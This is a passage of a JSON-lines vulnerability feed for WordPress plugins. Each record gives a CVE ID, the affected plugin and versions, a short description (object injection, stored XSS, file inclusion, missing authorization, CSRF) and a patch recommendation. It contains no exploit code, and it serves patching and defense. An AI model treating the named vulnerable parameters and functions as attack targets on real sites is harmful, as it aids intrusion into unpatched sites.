unnels&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193046%40wpfunnels&new=3193046%40wpfunnels&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9846cb0e-fc68-4a1b-a5a5-63116289c369?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9846cb0e-fc68-4a1b-a5a5-63116289c369?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10828","slug":"woo-order-export-lite","versionImpact":"3.5.5","versionEndExcluding":"3.5.6","description":"The Advanced Order Export For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.5 via deserialization of untrusted input during Order export when the \"Try to convert serialized values\" option is enabled. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 3.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1c6eed6-7b3f-4b37-85f8-6613527daa54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1c6eed6-7b3f-4b37-85f8-6613527daa54?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-export-lite\\\/trunk\\\/classes\\\/core\\\/trait-woe-core-extractor.php#L996\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-export-lite\\\/trunk\\\/classes\\\/core\\\/trait-woe-core-extractor.php#L996\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-export-lite\\\/trunk\\\/classes\\\/PHPExcel\\\/Shared\\\/XMLWriter.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-order-export-lite\\\/trunk\\\/classes\\\/PHPExcel\\\/Shared\\\/XMLWriter.php#L83\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12538","slug":"duplicate-pp","versionImpact":"3.5.5","versionEndExcluding":"3.5.6","description":"The Duplicate Post, Page and Any Custom Post plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.3 via the 'dpp_duplicate_as_draft' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts.","recommendation":"Update to version 3.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicate-pp\\\/trunk\\\/duplicate-pp.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicate-pp\\\/trunk\\\/duplicate-pp.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f38543ff-1074-4273-be33-8142d59e904f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f38543ff-1074-4273-be33-8142d59e904f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5260","slug":"sina-extension-for-elementor","versionImpact":"3.5.5","versionEndExcluding":"3.5.6","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018read_more_text\u2019 parameter in all versions up to, and including, 3.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da6dcf5c-bb70-4227-a784-55cf28980308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da6dcf5c-bb70-4227-a784-55cf28980308?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-blogpost.php#L2067\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-blogpost.php#L2067\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-table.php#L1659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-table.php#L1659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.5.6\\\/widgets\\\/advanced\\\/sina-blogpost.php?rev=3110446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.5.6\\\/widgets\\\/advanced\\\/sina-blogpost.php?rev=3110446\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.5.6\\\/widgets\\\/basic\\\/sina-table.php?rev=3110446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/tags\\\/3.5.6\\\/widgets\\\/basic\\\/sina-table.php?rev=3110446\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24881","slug":"content-protector","versionEndExcluding":"3.5.5.9","description":"The Passster WordPress plugin before 3.5.5.9 does not properly check for password, as well as that the post to be viewed is public, allowing unauthenticated users to bypass the protection offered by the plugin, and access arbitrary posts (such as private) content, by sending a specifically crafted request.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0967303d-ea49-4993-84eb-a7ec97240071\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0967303d-ea49-4993-84eb-a7ec97240071\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24837","slug":"content-protector","versionEndExcluding":"3.5.5.9","description":"The Passster WordPress plugin before 3.5.5.8 does not escape the area parameter of its shortcode, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fea3ac3-d599-41f3-8f76-08f0d3552af1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fea3ac3-d599-41f3-8f76-08f0d3552af1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5036","slug":"sina-extension-for-elementor","versionImpact":"3.5.4","versionEndExcluding":"3.5.5","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 3.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64f11bc9-88b5-43d5-bc76-129dc5909210?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64f11bc9-88b5-43d5-bc76-129dc5909210?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-counter.php#L687\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-counter.php#L687\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104601\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104601\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4953","slug":"elementor","versionEndExcluding":"3.5.5","description":"The Elementor Website Builder WordPress plugin before 3.5.5 does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8273357e-f9e1-44bc-8082-8faab838eda7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8273357e-f9e1-44bc-8082-8faab838eda7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/elementor\\\/elementor\\\/commit\\\/292fc49e0f979bd52d838f0326d1faaebfa59f5e\",\"name\":\"https:\\\/\\\/github.com\\\/elementor\\\/elementor\\\/commit\\\/292fc49e0f979bd52d838f0326d1faaebfa59f5e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2298","slug":"affiliate-toolkit-starter","versionImpact":"3.5.4","versionEndExcluding":"3.5.5","description":"The affiliate-toolkit \u2013 WordPress Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the atkp_import_product() function in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to to perform unauthorized actions such as creating importing products.","recommendation":"Update to version 3.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4d0176-3b7d-4de5-95ec-365873e6f13b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4d0176-3b7d-4de5-95ec-365873e6f13b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045821\\\/affiliate-toolkit-starter\\\/trunk\\\/includes\\\/atkp_endpoints.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045821\\\/affiliate-toolkit-starter\\\/trunk\\\/includes\\\/atkp_endpoints.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1851","slug":"affiliate-toolkit-starter","versionImpact":"3.5.4","versionEndExcluding":"3.5.5","description":"The affiliate-toolkit \u2013 WordPress Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the atkp_create_list() function in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to to perform unauthorized actions such as creating product lists.","recommendation":"Update to version 3.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e256b0-e4e3-4f41-842c-80aa2b80af72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e256b0-e4e3-4f41-842c-80aa2b80af72?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045821\\\/affiliate-toolkit-starter\\\/trunk\\\/includes\\\/atkp_endpoints.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045821\\\/affiliate-toolkit-starter\\\/trunk\\\/includes\\\/atkp_endpoints.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12578","slug":"tickera-event-ticketing-system","versionImpact":"3.5.4.8","versionEndExcluding":"3.5.4.9","description":"The Tickera \u2013 WordPress Event Ticketing plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.5.4.8 via the 'tickera_tickets_info' endpoint. This makes it possible for unauthenticated attackers to extract sensitive data from bookings like full names, email addresses, check-in\/out timestamps and more.","recommendation":"Update to version 3.5.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201476%40tickera-event-ticketing-system&new=3201476%40tickera-event-ticketing-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201476%40tickera-event-ticketing-system&new=3201476%40tickera-event-ticketing-system&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2db29c12-bf8a-4d5a-b12a-6c74b816d5f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2db29c12-bf8a-4d5a-b12a-6c74b816d5f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10263","slug":"tickera-event-ticketing-system","versionImpact":"3.5.4.4","versionEndExcluding":"3.5.4.6","description":"The Tickera \u2013 WordPress Event Ticketing plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.5.4.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.5.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e5e9249-9705-4cfa-9c8e-2e002190562b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e5e9249-9705-4cfa-9c8e-2e002190562b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179272\\\/tickera-event-ticketing-system\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179272\\\/tickera-event-ticketing-system\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7495","slug":"wp-members","versionImpact":"3.5.4.1","versionEndExcluding":"3.5.4.2","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpmem_login_link' shortcode in all versions up to, and including, 3.5.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/api\\\/api.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/api\\\/api.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/class-wp-members-shortcodes.php#L1092\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/class-wp-members-shortcodes.php#L1092\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/vendor\\\/rocketgeek-utilities\\\/includes\\\/utilities.php#L259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.4.1\\\/includes\\\/vendor\\\/rocketgeek-utilities\\\/includes\\\/utilities.php#L259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3331571%40wp-members&new=3331571%40wp-members&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3331571%40wp-members&new=3331571%40wp-members&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/942df4bc-2a17-4add-9664-60d77319b93a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/942df4bc-2a17-4add-9664-60d77319b93a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1529","slug":"am-lottieplayer","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The AM LottiePlayer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded lottie files in all versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278523\\\/am-lottieplayer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3278523\\\/am-lottieplayer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f44fcc8-c5e0-44f5-92c3-6603b19a06fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f44fcc8-c5e0-44f5-92c3-6603b19a06fe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4373","slug":"sina-extension-for-elementor","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sina Particle Layer widget in all versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee04b1d-188a-4b92-a6f3-dfa843ca20d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee04b1d-188a-4b92-a6f3-dfa843ca20d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3085825%40sina-extension-for-elementor&new=3085825%40sina-extension-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3085825%40sina-extension-for-elementor&new=3085825%40sina-extension-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2505","slug":"age-gate","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Age Gate plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 3.5.3 via the 'lang' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary PHP files on the server, allowing the execution of code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/age-gate\\\/trunk\\\/vendor\\\/agegate\\\/common\\\/src\\\/Settings.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/age-gate\\\/trunk\\\/vendor\\\/agegate\\\/common\\\/src\\\/Settings.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258075\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258075\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ac2996-098f-474c-b44e-78d5af7b503a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ac2996-098f-474c-b44e-78d5af7b503a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3163","slug":"easy-property-listings","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Easy Property Listings WordPress plugin before 3.5.4 does not have CSRF check when deleting contacts in bulk, which could allow attackers to make a logged in admin delete them via a CSRF attack","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f89c8654-5486-4939-880d-101f33d359c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f89c8654-5486-4939-880d-101f33d359c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4333","slug":"sina-extension-for-elementor","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via several parameters in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085825\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085825\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/assets\\\/js\\\/jquery.countdown.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/assets\\\/js\\\/jquery.countdown.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/assets\\\/js\\\/typed.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/assets\\\/js\\\/typed.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f616df94-7839-49db-baa5-88f8f1de208f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f616df94-7839-49db-baa5-88f8f1de208f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2869","slug":"easy-property-listings","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Easy Property Listings WordPress plugin before 3.5.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4093c12e-f62b-4357-8893-649cd2aaeace\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4093c12e-f62b-4357-8893-649cd2aaeace\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13800","slug":"convertplug","versionImpact":"3.5.30","versionEndExcluding":"3.5.31","description":"The ConvertPlus plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the 'cp_dismiss_notice' AJAX endpoint in all versions up to, and including, 3.5.30. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to '1' on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration.","recommendation":"Update to version 3.5.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"name\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/580ae2da-76f2-42b3-a26c-62ad8d6d1686?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/580ae2da-76f2-42b3-a26c-62ad8d6d1686?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4479","slug":"elementskit-lite","versionImpact":"3.5.2","versionEndExcluding":"3.5.3","description":"The ElementsKit Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin image comparison widget's before\/after labels in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.5.0\\\/widgets\\\/init\\\/assets\\\/js\\\/elementor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.5.0\\\/widgets\\\/init\\\/assets\\\/js\\\/elementor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.5.0\\\/widgets\\\/init\\\/assets\\\/js\\\/widget-scripts.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.5.0\\\/widgets\\\/init\\\/assets\\\/js\\\/widget-scripts.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3311822%40elementskit-lite&old=3300179%40elementskit-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3311822%40elementskit-lite&old=3300179%40elementskit-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2995828-8a3e-400d-9e2b-aba8fd17cf00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2995828-8a3e-400d-9e2b-aba8fd17cf00?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8239","slug":"starbox","versionImpact":"3.5.2","versionEndExcluding":"3.5.3","description":"The Starbox  WordPress plugin before 3.5.3 does not properly render social media profiles URLs in certain contexts, like the malicious user's profile or pages where the starbox shortcode is used, which may be abused by users with at least the contributor role to conduct Stored XSS attacks.","recommendation":"Update to version 3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02796da0-218d-4cbb-98ca-49eeea83cac5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02796da0-218d-4cbb-98ca-49eeea83cac5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
